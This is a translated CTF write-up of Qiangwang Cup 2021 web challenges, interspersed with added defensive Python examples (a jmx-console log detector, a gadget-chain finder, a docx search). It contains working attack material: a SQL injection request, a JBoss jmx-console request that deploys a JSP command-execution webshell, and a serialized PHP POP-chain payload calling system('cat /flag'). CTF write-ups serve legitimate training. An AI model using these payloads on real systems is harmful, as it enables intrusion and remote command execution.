白帽酱
5th 强网杯 (Qiangwang Cup) National Cybersecurity Challenge: partial WEB writeup (强网杯 2021)
2021/06/14  Tags: CTF, CTF WRITEUP, 强网杯

EASYWEB

Checking the network requests in the browser console reveals a files endpoint.

Visiting 47.104.137.239/files/c09358adff2ebfff2ef9b4fbacc4ac0b downloads hint.txt, which contains the hint:

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

Following the hint, a port scan shows port 36842 open.
The username parameter is vulnerable to SQL injection:

POST /account/login HTTP/1.1
Host: 47.104.137.239:36842
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
DNT: 1
Connection: close
Referer: http://121.42.242.238:36842/account/login
Cookie: ci_session=bo397pc9n0pd318uetdbl1r5rh33u3jb
Upgrade-Insecure-Requests: 1

username=admin*&password=admin

This yields the login credentials:
admin 99f609527226e076d668668582ac4420
Log in to the admin panel.
There is nothing exploitable in the admin panel itself.

Continuing with directory scanning reveals a file upload route.
Craft a filename that bypasses the restriction and upload a PHP file.
Privileges are too low to read the flag (only the owner can read it; the flag is presumably mode 0440), so the root group is needed.
Checking the listening ports shows other services.
Use the uploaded small webshell to write a new PHP shell.
Set up a tunnel through the shell to reach that web service.

It turns out to be a JBoss instance whose jmx-console is accessible without authentication.


/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell1&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%25 if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%25>&argType=boolean&arg4=True

Write a one-liner shell.
Got the flag.
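The jmx-console abuse above leaves a very recognisable trace in the web server's access log. The following Python is an added example, not part of the original writeup: it scans constructed Apache-style log lines (the IPs, timestamps and user agents are made up) for HtmlAdaptor requests that invoke a deployment MBean operation such as DeploymentFileRepository.store, which is what the request on this page uses, and separately for any jmx-console page served with HTTP 200. The sample lines, the field names in the finding dict and the severity labels are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined"-style access log; IPs, timestamps and user
# agents are made up for this example. Line 3 mirrors the shape of the
# HtmlAdaptor request quoted in the writeup (deployment arguments shortened).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jun/2021:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jun/2021:10:02:15 +0800] "GET /jmx-console/ HTTP/1.1" 200 8843 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jun/2021:10:02:40 +0800] "GET /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&arg1=shell1&argType=java.lang.String&arg2=.jsp HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jun/2021:10:03:01 +0800] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Atype%3DServerInfo HTTP/1.1" 401 0 "-" "curl/7.68.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# MBeans and operations that make the server run new code; the writeup's
# request calls DeploymentFileRepository.store to drop a .jsp into a .war.
DEPLOY_MBEANS = ("DeploymentFileRepository", "MainDeployer")
DEPLOY_METHODS = ("store", "deploy", "redeploy")


def classify(line):
    """Return a finding dict for one log line, or None if it is not of interest."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.startswith("/jmx-console"):
        return None
    status = int(m.group("status"))
    # parse_qs percent-decodes values, so name= becomes "jboss.admin:service=..."
    q = {k: v[0] for k, v in parse_qs(url.query).items()}
    mbean = q.get("name", "")
    method = q.get("methodName", "")
    finding = {"ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
               "status": status, "mbean": mbean, "method": method}
    if (q.get("action") == "invokeOpByName"
            and any(x in mbean for x in DEPLOY_MBEANS)
            and method in DEPLOY_METHODS):
        # HTTP 200 means the console accepted the operation; anything else
        # is still an attempt worth looking at
        finding["severity"] = "critical" if status == 200 else "high"
        finding["reason"] = "deployment operation invoked via jmx-console"
        return finding
    if status == 200:
        # A console page served with 200: confirm the client actually
        # authenticated, otherwise the console is exposed
        finding["severity"] = "medium"
        finding["reason"] = "jmx-console served with HTTP 200"
        return finding
    return None


def scan(log_text):
    """Classify every line of an access log; returns the list of findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], f["mbean"], f["method"], "-", f["reason"])
```

The mitigation the finding points at is the usual one: the jmx-console (and web-console, which exposes the same MBeans) should either be removed from the deployment or require authentication, so that a request like line 3 gets a 401 rather than a 200.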

pop_master

This challenge requires building a deserialization (POP) gadget chain that ends in RCE.
Since the challenge has a huge number of classes (10,000), an automated script is written to build the POP chain.

Step 1: convert class.php.txt into an AST (abstract syntax tree) and save it as JSON:
<?php
ini_set("memory_limit", "-1");
// php-ast: parse the class file with AST version 70 and dump the tree as JSON
echo(json_encode(ast\parse_file("class.php", 70)));
The construction is fairly simple: A -> B -> C -> ... -> a class method that contains eval().
There are several pitfalls along the call chain: 1. the argument gets polluted (garbage data appended); 2. the argument may be cleared (the parameter is assigned an undefined variable); 3. the argument may be modified (directly assigned garbage data).
So merely finding a call chain does not finish the job; the chain must also be one that is actually usable.

Automation script:
PS: not much reference value, it only works for this challenge. Because there are only 3 fixed function structures I lazily hard-coded the parameters. I'm new to Python and this is my first time parsing an AST, hence this clumsy approach.

# -*- coding: utf-8 -*-
import json
import random
import os
import string

# 12.json is the one-line JSON dump of the php-ast tree produced above
with open("12.json") as f:
    line = f.readline()
result = json.loads(line)
print(len(result['children']))


def asb(name, s, s1=''):
    # Walk the classes looking for a method called `name`; for each hit print
    # the PHP `new` for that class, recurse into the method it calls on its
    # property, then print the assignment that links this object to its parent.
    ee = 0
    for a in result['children']:
        for b in a['children']['stmts']['children']:
            if 'name' in b['children'].keys():
                if b['children']['name'] == 'gG1T5D':
                    ee = 0
                    # ee = 1
                if b['children']['name'] == name:
                    test(a)
                    if len(b['children']['stmts']['children']) == 3:
                        q = b['children']['stmts']['children'][1]['children'][0]['children']['cond']['children']['args']['children'][1]
                        w = b['children']['stmts']['children'][random.randint(1, 2)]['children'][0]['children']['cond']['children']['args']['children'][1]  # random branch: trial-and-error construction
                        # print(s + q)
                        # print(s + w)
                        ran_str = ''.join(random.sample(string.ascii_letters, 8))
                        print('$' + ran_str + '=new ' + a['children']['name'] + '();')
                        s11 = '$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
                        # if s1 != '':
                        #     asb(w, s + w + '-->')
                        #     asb(q, s + q + '-->')
                        if ee != 1:
                            asb(w, s, s11)  # branch function 1
                            # asb(q, s, s11)  # branch function 2
                        if ran_str == '':
                            exit()
                        print(s1 + '$' + ran_str + ';')
                        # asb(q, s + q + '-->')
                    else:
                        if 'method' in b['children']['stmts']['children'][1]['children'].keys():  # no branch
                            q = b['children']['stmts']['children'][1]['children']['method']
                            ran_str = ''.join(random.sample(string.ascii_letters, 8))
                            print('$' + ran_str + '=new ' + a['children']['name'] + '();')
                            s11 = '$' + ran_str + '->' + a['children']['stmts']['children'][0]['children']['props']['children'][0]['children']['name'] + '='
                            # print(s + q)
                            if ee != 1:
                                asb(q, s, s11)
                            if ran_str == '':
                                exit()
                            print(s1 + '$' + ran_str + ';')


def test(d):
    # Reject a class whose method's first statement is `$param = $other;`,
    # i.e. the argument is overwritten with a nonexistent variable.
    # if name in {'Name', 'COiLxB'}:
    #     print('nono')
    #     exit()
    try:
        a = d['children']['stmts']['children'][1]['children']['params']['children'][0]['children']['name']
        b = d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['var']['children']['name']
        c = d['children']['stmts']['children'][1]['children']['stmts']['children'][0]['children']['stmts']['children'][0]['children']['expr']['children']['name']
        if a == b and b != c and a != 'DgiNa':  # check whether the assignment overwrites the parameter with a nonexistent variable
            print(a, b, c)
            print('no')
            asb('YYdqkf', 'YYdqkf' + '-->')  # search again
            os._exit(0)
    except:  # the method does not have the expected shape; nothing to check
        pass


asb('YYdqkf', 'YYdqkf' + '-->')

Write a script to process the AST.
Randomly pick one constructed chain and check whether it executes normally (detecting argument modification); repeat until a usable chain is obtained.
PS: the example screenshot output is unrelated to the code below; I couldn't find the screenshot of the successful run.
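As an added illustration of the "found chain" versus "usable chain" point above (this is not the writeup's own script), the following Python reduces the search to a graph problem: each class is summarised as the method it defines, the method names it calls through its property, and whether it clobbers its argument the way the test() function above checks. A breadth-first search then returns only chains in which every hop preserves the argument, instead of sampling chains at random until one works. The class table is constructed for this example (real input would be the php-ast JSON); only pitfall 2 is modelled, as in the page's test(), and both sides of an if/else are treated as reachable, which is the same simplification the page makes.

```python
from collections import deque

# Constructed toy class table standing in for the 10,000-class AST of the
# challenge. Each entry is what an AST walk extracts from one class:
#   prop     - the property the method calls through ($this->prop->...)
#   method   - the method name this class defines
#   calls    - method names invoked on $this->prop (two = an if/else branch)
#   clobbers - True if the method's first statement overwrites its parameter
#              with an undefined variable (pitfall 2 above, the test() check)
#   sink     - True if the method passes its parameter to eval()
CLASSES = {
    "C1": dict(prop="p1", method="entry", calls=["m2", "m3"], clobbers=False, sink=False),
    "C2": dict(prop="p2", method="m2", calls=["m4"], clobbers=True, sink=False),
    "C3": dict(prop="p3", method="m3", calls=["m4"], clobbers=False, sink=False),
    "C4": dict(prop="p4", method="m4", calls=["m5", "m2"], clobbers=False, sink=False),
    "C5": dict(prop="p5", method="m5", calls=[], clobbers=False, sink=True),
    "C6": dict(prop="p6", method="m2", calls=["m5"], clobbers=False, sink=False),
}


def classes_defining(classes, method):
    """All classes that define `method`; any of them can be stored in the
    (untyped) property, so each is a candidate next hop in the chain."""
    return [c for c, info in classes.items() if info["method"] == method]


def find_usable_chain(classes, entry_method):
    """Shortest class chain from a class defining entry_method to an eval()
    sink in which no hop clobbers its argument; None if there is none."""
    start = [c for c in classes_defining(classes, entry_method)
             if not classes[c]["clobbers"]]
    queue = deque([c] for c in start)
    seen = set(start)
    while queue:
        path = queue.popleft()
        cur = classes[path[-1]]
        if cur["sink"]:
            return path
        for target in cur["calls"]:
            for nxt in classes_defining(classes, target):
                # A class whose method overwrites the argument is skipped even
                # though its method name matches: that is the difference
                # between a chain that exists and a chain that is usable.
                if nxt in seen or classes[nxt]["clobbers"]:
                    continue
                seen.add(nxt)
                queue.append(path + [nxt])
    return None


def build_php(classes, chain):
    """Emit PHP wiring the chain the way the writeup's generated script does:
    one `new` per class, then property assignments from the innermost object
    outward. The variable names $o0, $o1, ... are this example's convention."""
    names = [f"$o{i}" for i in range(len(chain))]
    lines = [f"{v}=new {c}();" for v, c in zip(names, chain)]
    for i in range(len(chain) - 2, -1, -1):
        lines.append(f"{names[i]}->{classes[chain[i]]['prop']}={names[i + 1]};")
    return lines


if __name__ == "__main__":
    chain = find_usable_chain(CLASSES, "entry")
    print(" -> ".join(chain))
    print("\n".join(build_php(CLASSES, chain)))
```

In the toy table the method name m2 is defined both by C2 (which clobbers its argument) and by C6 (which does not), so the search must look past the first class that matches a name; a random pick between the two is exactly where the original script's "repeat until it works" loop spends its time. The same structure is the audit a code owner would run: every class reachable from a magic method or from `unserialize()` output that ends at `eval()` without dropping its argument is a gadget chain that needs to be broken.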

<?php
// ... the 3 MB of class source is omitted here ...
$a=new WK4tcG();
$prXsQMfO=new WK4tcG();
$DLcTtAga=new xaeGnG();
$lcbgRpGI=new oAMzcx();
$IatldcbW=new p38LCI();
$nULgbaKw=new GbfW4c();
$ASyQaYMV=new m2s3zO();
$GMwztlCS=new PgSSqR();
$MegPsOnX=new RLuIRL();
$neJOwgfu=new WykBAC();
$PNHChDce=new g6hgDh();
$BzceWjKp=new HDaeRV();
$YThMXwcb=new bREm3w();
$xWVjhwmO=new D0aZh5();
$BIbCvgZD=new T9NX4U();
$prvhXPMW=new eWciOL();
$NVHbgdzD=new TqWDlm();
$mszgihWC=new XoFA87();
$vDBkPwqO=new MU1ai5();
$ZYHhsIid=new eHtdBF();
$ZYHhsIid->V7XKdgi=new DNUWgV();
$vDBkPwqO->zXEmp6T=$ZYHhsIid;
$mszgihWC->z35pfqP=$vDBkPwqO;
$NVHbgdzD->KGgGFnb=$mszgihWC;
$prvhXPMW->D6qeYVK=$NVHbgdzD;
$BIbCvgZD->UwQCEH2=$prvhXPMW;
$xWVjhwmO->ST8sCZq=$BIbCvgZD;
$YThMXwcb->pMgtiwK=$xWVjhwmO;
$BzceWjKp->OO72gIu=$YThMXwcb;
$PNHChDce->GYBlHLq=$BzceWjKp;
$neJOwgfu->yWYNYcP=$PNHChDce;
$MegPsOnX->dFy0Irz=$neJOwgfu;
$GMwztlCS->Cs99EPC=$MegPsOnX;
$ASyQaYMV->QidIkAq=$GMwztlCS;
$nULgbaKw->gE4DrP9=$ASyQaYMV;
$IatldcbW->OksedLV=$nULgbaKw;
$lcbgRpGI->SUxaKsh=$IatldcbW;
$DLcTtAga->u3832FP=$lcbgRpGI;
$a->fBuH5Og=$DLcTtAga;
//$a = $_GET['pop'];
$b = $_GET['argv'];
echo serialize($a);
//$a = unserialize($a);
//var_dump($a);
$a->YYdqkf($b);
?>

Generate the serialized string:
?pop=O:6:%22WK4tcG%22:1:{s:7:%22fBuH5Og%22;O:6:%22xaeGnG%22:1:{s:7:%22u3832FP%22;O:6:%22oAMzcx%22:1:{s:7:%22SUxaKsh%22;O:6:%22p38LCI%22:1:{s:7:%22OksedLV%22;O:6:%22GbfW4c%22:1:{s:7:%22gE4DrP9%22;O:6:%22m2s3zO%22:1:{s:7:%22QidIkAq%22;O:6:%22PgSSqR%22:1:{s:7:%22Cs99EPC%22;O:6:%22RLuIRL%22:1:{s:7:%22dFy0Irz%22;O:6:%22WykBAC%22:1:{s:7:%22yWYNYcP%22;O:6:%22g6hgDh%22:1:{s:7:%22GYBlHLq%22;O:6:%22HDaeRV%22:1:{s:7:%22OO72gIu%22;O:6:%22bREm3w%22:1:{s:7:%22pMgtiwK%22;O:6:%22D0aZh5%22:1:{s:7:%22ST8sCZq%22;O:6:%22T9NX4U%22:1:{s:7:%22UwQCEH2%22;O:6:%22eWciOL%22:1:{s:7:%22D6qeYVK%22;O:6:%22TqWDlm%22:1:{s:7:%22KGgGFnb%22;O:6:%22XoFA87%22:1:{s:7:%22z35pfqP%22;O:6:%22MU1ai5%22:1:{s:7:%22zXEmp6T%22;O:6:%22eHtdBF%22:1:{s:7:%22V7XKdgi%22;O:6:%22DNUWgV%22:1:{s:7:%22bieiHE3%22;N;}}}}}}}}}}}}}}}}}}}}&argv=system(%27cat%20/flag%27);//
Requesting this URL gets the flag.

[强网先锋] 寻宝 (Treasure Hunt)

Two KEYs are needed to get the flag.

KEY1

<?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__);


function filter($string){
    $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
    $filter_phrase= '/'.implode('|',$filter_word).'/';
    return preg_replace($filter_phrase,'',$string);
}


if($ppp){
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';

extract($_POST);

$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);


if(isset($num1) && is_numeric($num1)){
    die("非数字");
}

else{

    if($num1 > 1024){
        echo "第一层";
        if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
            echo "第二层";
            if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
                echo "第三层";
                if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
                    echo "第四层";
                    if(!isset($num5)||(strlen($num5)==0)) die("no");
                    $b=json_decode(@$num5);
                    if($y = $b === NULL){
                        if($y === true){
                            echo "第五层";
                            include 'KeY1lhv.php';
                            echo $KEY1;
                        }
                    }else{
                        die("no");
                    }
                }else{
                    die("no");
                }
            }else{
                die("no");
            }
        }else{
            die("no");
        }
    }else{
        die("no111");
    }
}

number1, number2: use scientific notation.
number3: md5 prefix collision.
number4: a zero value with a minus sign bypasses the checks.
number5: {1} is invalid JSON, so json_decode returns NULL and the condition is true.
KEY1 obtained.

Key2

Download the file.
The archive contains a large number of docx files.
Write a script that extracts the body text of each docx and searches for text containing KEY.
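The extraction step needs only the standard library, since a .docx is a zip archive whose body text sits in word/document.xml. The snippet below is an added example rather than the author's script: it joins the <w:t> runs of each paragraph before searching, so a key that Word has split across formatting runs is still matched (a naive substring search over the raw XML would miss it), and it builds two small constructed .docx files in memory so it runs without the challenge archive. The file names, the sample text and the KEY pattern are assumptions of this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from pathlib import Path

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def docx_paragraphs(data):
    """Body paragraphs of a .docx given its raw bytes. The archive member
    word/document.xml holds <w:p> paragraphs made of <w:t> text runs; runs
    are joined per paragraph so text Word split across runs reads whole."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    paras = []
    for p in root.iter(f"{{{W_NS}}}p"):
        text = "".join(t.text or "" for t in p.iter(f"{{{W_NS}}}t"))
        if text.strip():
            paras.append(text)
    return paras


def find_key_paragraphs(docs, pattern=r"KEY"):
    """docs maps filename -> docx bytes; returns (filename, paragraph) for
    every paragraph whose text matches pattern."""
    rx = re.compile(pattern)
    return [(name, para) for name, data in docs.items()
            for para in docx_paragraphs(data) if rx.search(para)]


def load_dir(path):
    """Read every .docx under path into the mapping find_key_paragraphs takes
    (this is what you would point at the unpacked challenge archive)."""
    return {str(p): p.read_bytes() for p in sorted(Path(path).rglob("*.docx"))}


def make_docx(paragraph_runs):
    """Build a minimal .docx in memory; each inner list is the text runs of
    one paragraph. Constructed test input, not a file from the challenge."""
    body = "".join(
        "<w:p>" + "".join(f"<w:r><w:t>{run}</w:t></w:r>" for run in runs) + "</w:p>"
        for runs in paragraph_runs
    )
    xml = (f'<?xml version="1.0" encoding="UTF-8"?>'
           f'<w:document xmlns:w="{W_NS}"><w:body>{body}</w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()


# Two constructed documents: one benign, one with the key split across runs.
SAMPLE_DOCS = {
    "report_001.docx": make_docx([["Quarterly summary"], ["Nothing to see here"]]),
    "report_002.docx": make_docx([["Intro"], ["KE", "Y2: constructed-key-value"]]),
}


if __name__ == "__main__":
    for name, para in find_key_paragraphs(SAMPLE_DOCS):
        print(name, "->", para)
```

Against the real archive, `find_key_paragraphs(load_dir("unpacked/"))` does the whole search; text in headers, footers or text boxes lives in other members of the zip (word/header1.xml and so on), so a key hidden there would need those members added to the loop.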
KEY2 found.
Submit KEY1 and KEY2 to the site to get the flag.

Author: 白帽酱
Copyright notice: this article was first published on 白帽酱's blog; please credit the source when reposting.